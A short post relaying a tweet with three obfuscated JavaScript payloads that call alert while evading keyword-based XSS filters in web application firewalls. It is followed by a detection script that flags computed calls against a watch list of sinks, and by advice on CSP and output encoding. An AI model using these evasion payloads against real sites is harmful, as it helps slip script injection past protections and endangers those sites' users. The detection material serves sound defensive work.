A tweet shared a clever XSS WAF bypass technique using obfuscated payloads. The payloads obfuscate the 'alert' function to evade detection. The bypass payloads include:

1. (function(x){this[x+`ert`](1)})`al`
2. window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
3. document['default'+'View'][`\u0061lert`](3)

Security researchers can use these techniques to bypass XSS filters in Web Application Firewalls. More details at the tweet link.
Original tweet: https://twitter.com/therceman/status/1803392781504610573
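
Why a keyword signature misses these payloads, and what a filter or log review can key on instead, shown as an added example (not code from the tweet): the called property name is built at runtime, so the check looks for computed calls of the form obj[expr](...) rather than the word alert. The SINKS list, the function names and the two benign sample lines are assumptions made for illustration; the third payload is written with its \u0061 escape.

```javascript
// Added example, not from the tweet. SINKS is an assumed watch list.
const SINKS = ['alert', 'confirm', 'prompt', 'eval'];

// The kind of filter being bypassed: a plain keyword signature.
const keywordMatch = (src) => /alert\s*\(/.test(src);

// Decode \uXXXX and \xXX so an escaped name compares equal to its plain form.
function decodeEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})/g,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// Collect every computed member access that is invoked at once: obj[expr](...)
// or obj[expr]`...`. Brackets are depth-matched; brackets inside string
// literals are not treated specially, which is acceptable for a heuristic.
function computedCalls(src) {
  const found = [], stack = [];
  for (let i = 0; i < src.length; i++) {
    if (src[i] === '[') stack.push(i);
    else if (src[i] === ']' && stack.length) {
      const start = stack.pop();
      if (/^\s*[(`]/.test(src.slice(i + 1))) found.push(src.slice(start + 1, i));
    }
  }
  return found;
}

// Report how the called property name was built, and name the sink when the
// expression folds down to a single literal.
function inspect(src) {
  const reasons = new Set();
  for (const raw of computedCalls(src)) {
    const expr = decodeEscapes(raw);
    if (expr !== raw) reasons.add('escaped-name');
    if (expr.includes('+')) reasons.add('concatenated-name');
    const folded = expr.replace(/['"`]\s*\+\s*['"`]/g, '').replace(/['"`]/g, '');
    if (SINKS.includes(folded)) reasons.add('sink:' + folded);
  }
  return [...reasons].sort();
}

// Inputs: the page's three payloads, then two constructed benign lines.
const SAMPLES = [
  "(function(x){this[x+`ert`](1)})`al`",
  "window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)",
  "document['default'+'View'][`\\u0061lert`](3)",
  "rows[0].cells.length",
  "handlers[name](event)",
];
for (const s of SAMPLES) console.log(keywordMatch(s), inspect(s), s);
```

Legitimate scripts that dispatch with handlers['on' + type](e) also raise concatenated-name, so the result is better used as a scoring signal alongside output encoding and a Content Security Policy than as a standalone block rule.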